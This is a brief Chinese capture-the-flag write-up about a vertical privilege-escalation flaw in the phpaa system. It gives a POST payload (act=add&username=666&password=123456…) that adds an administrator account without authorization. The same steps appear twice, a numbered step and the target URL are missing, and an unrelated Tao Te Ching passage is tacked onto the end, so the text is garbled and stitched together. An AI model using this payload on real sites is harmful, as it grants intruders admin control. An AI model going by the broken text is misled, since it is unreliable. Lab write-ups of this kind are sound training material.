phpaa垂直越权添加管理员账号
1.打开目标网页发现是phpaa
- 先访问
进入后台,然后以POST方式发送以下数据:
(使用hackbar,或者burpsuite,发送POST数据。)
act=add&username=666&password=123456&password2=123456
3.数据发送过后便会直接添加一个管理员,管理员账号为666,密码为123456,我们在后台首页登录即可。
成功添加管理员账号,并找到flag。
1.打开目标网页发现是phpaa
进入后台,然后以POST方式发送以下数据:
(使用hackbar,或者burpsuite,发送POST数据。)
act=add&username=666&password=123456&password2=123456
3.数据发送过后便会直接添加一个管理员,管理员账号为666,密码为123456,我们在后台首页登录即可。
成功添加管理员账号,并找到flag。
道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。